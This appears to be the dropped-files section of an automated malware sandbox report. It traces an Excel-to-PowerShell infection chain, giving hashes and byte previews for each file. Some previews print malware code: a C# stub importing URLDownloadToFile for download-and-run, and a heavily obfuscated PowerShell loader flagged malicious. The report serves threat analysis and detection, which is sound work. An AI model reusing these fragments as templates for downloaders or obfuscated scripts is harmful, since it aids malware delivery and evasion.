                                                        MD5:5B33FAD5C47AD4C53490EA543B6A5887
                                                        SHA1:8293E0B0359CA55F9D750E95AD7893837E4CD370
                                                        SHA-256:6E98C1C564E8195B7153FE337F8109B3C5F0F19E5101BE491A9A09C26BE68C98
                                                        SHA-512:6E792400406D4D55B6A41FA6173B81E7FBD7CFC23D6092DAF63E20F2BD2342375B360D26AE401DE8B921E42C8C3EC75948115C701A8D600EAB239969E070C31E
                                                        Malicious:false
                                                        Preview:L....e.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP................:..Xn4Tb"....N..........4.......C:\Users\user\AppData\Local\Temp\RES6549.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.u.z.5.o.0.k.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.1132970382322633
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAhYak7YnqqLhNPN5Dlq5J:+RI+ycuZhN6hYakSLhNPNnqX
                                                        MD5:3AE91E586E34546222ED8882C08DB34E
                                                        SHA1:E2591A8AEE0AF208B0C8F77B21B981C2B0D5FCC3
                                                        SHA-256:1CBDE2D3D61BE79432BDCB5D8879BCD0AEC4996E5277F9D95799806EF93677EA
                                                        SHA-512:A4E8DE247229F74AEC999ACB8241CF1F95CA4165529C520915C9FD109FD56BC89E87E3D7EEB717AA295F9B59B349571A46EE85BFB30EA25D801D5A072AA8B831
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.u.z.5.o.0.k.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.u.z.5.o.0.k.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
                                                        Category:dropped
                                                        Size (bytes):467
                                                        Entropy (8bit):3.879643592723492
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuaDedyzg/kmMgQXReKJ8SRHy4HPJ1m86mEVbV8aFKy:V/DTLDfuaDwPMrXfHzQVvKy
                                                        MD5:8BC3ED6E28AB35F72A0DE01F822AC9EE
                                                        SHA1:8CE1F66FD7DE081279B13138726E1F61272E3ED8
                                                        SHA-256:8AEA2DEDC010B16ED515DB72353372CF133F23B21C4C8C711B03524091BD8160
                                                        SHA-512:A4E9FC811E2A9964AA1FC81DB1BBAFE921C3453862A50A664A48A2D4CF83CF6C081CF59E79BBF1A4B5B9C045F9C6104D7CDEE91A9B85FC0AABC0E15A19382164
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace QKyV.{. public class tdzIVnJZBYk. {. [DllImport("uRlmOn.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr gkVQkllZ,string khcp,string kVPwvS,uint IiyqSN,IntPtr JNj);.. }..}.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.268672007942001
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f5szxs7+AEszIP23f5J:p37Lvkmb6KzhsWZEohJ
                                                        MD5:9D1BD96A84A0DC3857F305B175DF85BD
                                                        SHA1:C16E6D8CA325E65B3072C169DDD52737DF9394DC
                                                        SHA-256:C0DC5D31AABF78BCA784760B855514A073FFE9A80172FEA1FFE5650C0591EE2A
                                                        SHA-512:32AF4AEAA67517DE4E41312E40DFA91866B1F44A830A8CF76CB4387BE27E6E2F3AFE2E2EAD312E1982717D8889EB4E299DACC52D18F720ACFB4E82BC25ABC518
                                                        Malicious:true
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.0.cs"
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3072
                                                        Entropy (8bit):2.837554791896512
                                                        Encrypted:false
                                                        SSDEEP:24:etGS69PBe5ekrl88Cckj/6wy8stkZfBkCbCZ0WI+ycuZhN6hYakSLhNPNnq:6Zskr+L/6p8TJBkCbCZX1ulyYa3VXq
                                                        MD5:817E2C5A2EA999B139275030C58B96CC
                                                        SHA1:B994E0112531BFC6B68CA6B24F21D515C486B67A
                                                        SHA-256:6114DCBEE99FB9FFC238F1D57D94FED5182FFD2CC2B2E98C636498E376A88B39
                                                        SHA-512:71703D88FB2C1EDC7B65C2572D66478152D4B6EC48330C268F01F32E06775BCBB4F417947F8521EC87C9E3EC351232351AFCC546EF595CB362C924087D89503F
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....w.....w...........................#.............. ?.....P ......Q.........W.....`.....e.....l.....s...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.mu
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.353418094559251
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KzvEoCKaMD5DqBVKVrdFAMBJTH:Akka60vEoCKdDcVKdBJj
                                                        MD5:1F3A0A458B9DAE2E70EB2F85174BAD12
                                                        SHA1:3D73C93ACB6866F4D5DA2E349A43FF1559DF3BB4
                                                        SHA-256:D94312538623EB42A5DAC1DF12E41F48AE83462B8E62950937EC01787F223038
                                                        SHA-512:56618A5D755BEF5DCF9EA698D101106BA0760747F8FE4C69C04AB9DBE0847B6218C5F9C241FAD106B72E187DFD226C4977FA3ED562BA4C9706A875ED9A331D1C
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\wlanext.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):452017
                                                        Entropy (8bit):2.2907928071456114
                                                        Encrypted:false
                                                        SSDEEP:3072:nceUkNUxshVME7hU9NU0nFKCOPX7q93VQ/FePcfz4liTx:ceUsHh2B3rGq93a/FePez4lA
                                                        MD5:CFC1693292A6FA4423DE4EA6D7214FC4
                                                        SHA1:51329C0E29AE97FED5B29734D10C71937B115D40
                                                        SHA-256:9EF5DE718A03BB0CFC8036BE061029E47F2B65C7FB97F1F0A38D36EDF04FB9F0
                                                        SHA-512:4F292AE045B2FA8A19E3FC2DAD43E6F8C4C16342742F3CDDE1F44BA1B7E7CCB8B36DE639E5EE5338A5DB1D6A35E18C1FA1813C019089953E96D71865AA995779
                                                        Malicious:false
                                                        Preview:..............IE..........u..C..x......................................... .....L................................C.......................r.........[.$.....o.........6"........w............c..................O........z2r....@........PA................w.......`e.......m..........JaO0.........4...............b.e..V......u.......I...q.........Q.......................W...............................\.B.........5.......................[.......U......q.................c.|...........f..........<...........O.w................................0...........j...............7......!........c.......................................a....C..............................9....>..^......................[........"...............p...2..........................)...............3./.....g...............}o......u.........p...........n...............?..I.............v..........Ng^.........................=.B...................._.................................:................................Rb....Y.............
                                                        Process:C:\Users\user\AppData\Roaming\wlanext.exe
                                                        File Type:ASCII text, with very long lines (4175), with CRLF, LF line terminators
                                                        Category:dropped
                                                        Size (bytes):71728
                                                        Entropy (8bit):5.19475938861983
                                                        Encrypted:false
                                                        SSDEEP:1536:5/quBkQjhD5zeJ93rzHqxhOH6h3s0fCZZjV/vhVO/SWBtx5:5/quBhj95w9PqCH90aLjJvhNMtP
                                                        MD5:2766F86E62C8D61940DC2522F8A82F95
                                                        SHA1:CC9A331C8194448233D7B7B557ADF479C971E23A
                                                        SHA-256:20D2F9D0C92426D68CADC14CC683EA09985C306B86D6D9C43197C831216A08A0
                                                        SHA-512:0C46AD1533CFAA33D1CB1D5D1FB8CED17DA0D8DF8F52943B24F2C6231B2D29BC28E31E85ACD59CC972F09C27CE2626CB1F0FC4807AB3FF9ED548975966756C32
                                                        Malicious:true
                                                        Preview:$Saling94=$Malingernes;..<#Udryddelsestruet Modsaetningerne Rheinlnderpolkaen Saturnist #>..<#Accorder Skyllerierne Usage Belagt #>..<#Ringbarks Ediths Maladjustment Amyroot Botaniserings byggemodent #>..<#Nephrotomy Dmmekrafts Blesbok Taknemlige Speak Winks snurretoppes #>..<#hustelefoner amphistome Bleeping #>..<#Filmcensuren Semidetached Optoelectronic Echoism Abcess remrk Papirmanuskript #>...$Chivalric = @'.Antraci.Las,ivi$st bharFPe vytruPosturanShapingjT,mposke styrvo=Resurfa$SkibsskDCestriaiCore,atk,astermtBr epsyaUkueligf BistorodeficitnIndvkegeG vernirbookisha shlarib TapeinnBrsinfoiCentr lnLomentugSkis ydsChi pabaFrazie,rDiabro rT mpusfa SpecianHexame gThioaceeSerial mSpringbeElefsfin stinkyt Semi ieIdiotist,ebeset;T.ansna.EarthwofPalaveruEpithecnSalvernc LingvitOperettiOverchaoReprsennUndertr P stdiO K ndervDrs.ioneAfkortnr KongrufScab.iklBrandalyDelmaentUnlovinn Telefoi.ydrodynBalandrgFinanspsAnti ri Eugeosy(Ferriti$ pidskaD DecastiUg.eskakInd jentEduta.naMacrocofMist.keo
                                                        Process:C:\Users\user\AppData\Roaming\wlanext.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):479
                                                        Entropy (8bit):4.245739395890601
                                                        Encrypted:false
                                                        SSDEEP:6:2BJR4H4EduLCin3GLpsMA5jKGay2gCW5jmWXxaAJhTaR9G4FbIC6YWCY2I1j2y:SReduL5nMKjaEjthaAjSMoD6VH2I1j2y
                                                        MD5:DA2B21298D7BAC439CD1EA3AC47F7866
                                                        SHA1:1180904256A2CFDED5BBF3EC67E53178AC278C7F
                                                        SHA-256:F2CA2632B5FF825BD631092BFB6D71FC4669E0F487FC49B58F4710024F4B89C4
                                                        SHA-512:0071008D7FA440509188FD643AE2F5E707CC24A95EC64F419DEE8A3E014B9F2E2BDE40182A07869AF0C0BAE7089AAF89684A6070EC421E79F003E8DC412FF2DA
                                                        Malicious:false
                                                        Preview:azotemia fainting phycoerythrin stentando jitney colley,vagtmesterens aeolistic samhrigheds bedrifters velkldthed frysetrrede bobbysoxers lemlst letching etaerne..vrelsesanvisningerne stenogrammers cognations bekymret.deklarering chervante sjaskeris radarskrmes biklang servicebureau amerikanererne postcards..titivates taces recelebrated,avanceredes parallelodrome spermatia tidsbestemmer heterogeny shirtinget udflytningens aandssvages videoklub formidlingsindsatses funklede..
                                                        Process:C:\Users\user\AppData\Roaming\wlanext.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):450653
                                                        Entropy (8bit):2.2992929640630795
                                                        Encrypted:false
                                                        SSDEEP:3072:smAcos5/nDh2e3T+ey5w6j6dOaaXYyS44COAHNQ3M:tAcoiEenQ67aYb44yQ3
                                                        MD5:913FB8371A4307B3DBC98975306E0FB3
                                                        SHA1:4D6128E0B24FFC50F2AB09AC082D22B66ADFE1E6
                                                        SHA-256:ACEDFA1D66401EC77F24737E8A4A9657798861330DB267E2F4E59B6B5EEBF179
                                                        SHA-512:92A4A07479064BE793F7E3EC1B201BD8EA37058114EBA065D691BF787F16FA8C34AC4FFDDB2CFF8F71C473A0C5756A49A8FDE0BED11B84416D8F718110D70480
                                                        Malicious:false
                                                        Preview:..........3.D.........d....R..2.......#......................b......I.................B....-.................3..(...E....V................2......................^....n8.......^.........6:........4.....U@.............o.......................................a...{..........H...........)..................}.....[.......................ja.............5........5........W.C.................g.....@........9.....................p..7..........N........................S................."...........................................H4.-...................Q........7............{........96...................N.......................0...........c................................I.....k..........O.............[..........ar.............N...........B.............H.......V...........3..o...........q..|.................................h..........................%.........u......P..g}..............7...................K...&............H..............................G.....|..|......................J..........
                                                        Process:C:\Users\user\AppData\Roaming\wlanext.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):123513
                                                        Entropy (8bit):2.2973556752436455
                                                        Encrypted:false
                                                        SSDEEP:768:Qk455JVbpGo8b5SqA/5n2xrxWqSwMvldK8ijI/GFX//Q/nDULqAs//6SoA2PpzBq:Ql5/Kb5Sv2W73vldeGwn61As//6/l4
                                                        MD5:CE36A2BA6422013091438D568FD65193
                                                        SHA1:F20F7B837D70297B37CE212EE4BC8980DB3E5427
                                                        SHA-256:053D85EC228282E11A69B40B0775E7D3805FD797DFD4677926610833463118AD
                                                        SHA-512:7FD6F978AA9D942C1731B680A1A0573487F66616F57A440E1453AA40F149FCA9FF0C94FF33D089986D1654767676C6463D6103F9788BF1B4AF1996A64C9FDF18
                                                        Malicious:false
                                                        Preview:.........6e...........................6.....y.................................f..............................................6.......(!.......}..........,L.......................................p..............................l.8..............1.....J...................................................g....................................:..........................k...... ..........................i...0....f..................U....b.x....s.....v...7...........i...L.........f......................l........x.................$........Q.....................a......................f...............................f.)...........................................5..w.....................L................................%..............Y..................................K...a...K.............o5..............N.....I.......*...........V......O...........................u...............................w..,.........!...\..H.................i................J.Y......................W.....).....}..........
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):738435
                                                        Entropy (8bit):7.94919421571998
                                                        Encrypted:false
                                                        SSDEEP:12288:Mzve08P627lFHqh94GdRwQc6ZvU234p8aHAxPFxImRraIgLNKYJpp/PXpCFWjKIl:cmtPMh94GdRwQcgvvGX+ImRraTLBn0Fo
                                                        MD5:2F9C0BA283506D8333E4F59B29FBEBA3
                                                        SHA1:23BC0A40B6690DAB55D797E9C35CD82D796B85B1
                                                        SHA-256:979268F75B22895FAA5D5B6B39442C8CAA36D325EDEA3FAF7C3D7A81D09041B0
                                                        SHA-512:A37AABDA8BE17AA24C854996784974A033F724932CAA8BEA4B036E9C60C08B834610BB0D569BD9D7A6CDEE34B921528F969E5A3970F05DF3387F46B80775CBDB
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...9.oZ.................d...|.......2............@..........................p............@.................................4............f...........................................................................................................text....b.......d.................. ..`.rdata..T............h..............@..@.data....U...........|..............@....ndata...................................rsrc....f.......h..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\wlanext.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):311522
                                                        Entropy (8bit):7.666626729903848
                                                        Encrypted:false
                                                        SSDEEP:6144:j+7HcBLCB9vKGMtJD68ObAHf5MCTsvkyO6X4aZSpSN7fWmKLXCh++qto3/LeeSjx:j+7HcBLCB9vKGMtJD68ObAHf5MHvh9nO
                                                        MD5:BF0AE96B3C32CA698C6492BA09769C91
                                                        SHA1:5FB3A2489ADE567DC267D48D46C9A37175B1309F
                                                        SHA-256:6BAD1E0AE040D5FFD918DB53F4B146CE35DE2AFAAD296E096C41C3E7DFCB953F
                                                        SHA-512:16AFEAC5C98EA19E527920E169AF7D178A117C6D5B5F8E4924C5418D1D7604CE7838868B3444993C32FA33A9177E96921BA08ED16B1A998B294FFBD27B7D3439
                                                        Malicious:false
                                                        Preview:....m....iii.N.........).ss......................:..$....pp......SSS...........#....!.,........,,....+...........U.........F.......00.....k............^............~........Q...............DDDD.....................F........V...~~.OO...'............,...'''.............F....(....&&&.J......}.F............"""......8............3..........//.....................v................."...33.................jj.bb.D............!.cc.......9.....99........[............___...........``....#.T...............m...xx...a.............s...................+.uuu........................K................=======.V...........L............%%%...............!...............>......V...............p.......................................8....9.......Y.....===..........ww.......!!!!.ddddd.SS..:...........E.....i.....x...UUU..............x.........#...........~~~............AA............................o....ZZ............~..QQQQQQ...........ss........oo.Q.....gg............................................p..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):738435
                                                        Entropy (8bit):7.94919421571998
                                                        Encrypted:false
                                                        SSDEEP:12288:Mzve08P627lFHqh94GdRwQc6ZvU234p8aHAxPFxImRraIgLNKYJpp/PXpCFWjKIl:cmtPMh94GdRwQcgvvGX+ImRraTLBn0Fo
                                                        MD5:2F9C0BA283506D8333E4F59B29FBEBA3
                                                        SHA1:23BC0A40B6690DAB55D797E9C35CD82D796B85B1
                                                        SHA-256:979268F75B22895FAA5D5B6B39442C8CAA36D325EDEA3FAF7C3D7A81D09041B0
                                                        SHA-512:A37AABDA8BE17AA24C854996784974A033F724932CAA8BEA4B036E9C60C08B834610BB0D569BD9D7A6CDEE34B921528F969E5A3970F05DF3387F46B80775CBDB
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...9.oZ.................d...|.......2............@..........................p............@.................................4............f...........................................................................................................text....b.......d.................. ..`.rdata..T............h..............@..@.data....U...........|..............@....ndata...................................rsrc....f.......h..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 10:21:43 2024, Security: 1
                                                        Category:dropped
                                                        Size (bytes):91136
                                                        Entropy (8bit):7.812893580916802
                                                        Encrypted:false
                                                        SSDEEP:1536:0iqHy1S6F8b2SQrEkawpoXIogNoYlBxsyeCSe/4NzbpQUdzFGbVJc5pupq:seFHrE2sIoEBxBupQ2zFGE58
                                                        MD5:60F736FA876F3E41BEC67FAD6595C8F6
                                                        SHA1:01F3E7686C1F436D313B6EDA527FE461AE8DBF78
                                                        SHA-256:69A63D918F450A33A71922F7B9717F6393BE370C5070A2B96EB571D7D47F33BF
                                                        SHA-512:EA024EBA5CDB37026300A2BD47A672EC32CAC304F0397C6686F731815F064F1B0DE11A98584EC42FB4D57498BD0769722D5489FE81D6818A2B6F5BCE140DF85B
                                                        Malicious:false
                                                        Preview:......................>...................................N...................q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...........P.......R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...r.......s...t...u...v...w...x...y...z...
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 10:21:43 2024, Security: 1
                                                        Category:dropped
                                                        Size (bytes):91136
                                                        Entropy (8bit):7.812893580916802
                                                        Encrypted:false
                                                        SSDEEP:1536:0iqHy1S6F8b2SQrEkawpoXIogNoYlBxsyeCSe/4NzbpQUdzFGbVJc5pupq:seFHrE2sIoEBxBupQ2zFGE58
                                                        MD5:60F736FA876F3E41BEC67FAD6595C8F6
                                                        SHA1:01F3E7686C1F436D313B6EDA527FE461AE8DBF78
                                                        SHA-256:69A63D918F450A33A71922F7B9717F6393BE370C5070A2B96EB571D7D47F33BF
                                                        SHA-512:EA024EBA5CDB37026300A2BD47A672EC32CAC304F0397C6686F731815F064F1B0DE11A98584EC42FB4D57498BD0769722D5489FE81D6818A2B6F5BCE140DF85B
                                                        Malicious:false
                                                        Preview:......................>...................................N...................q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...........P.......R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...r.......s...t...u...v...w...x...y...z...
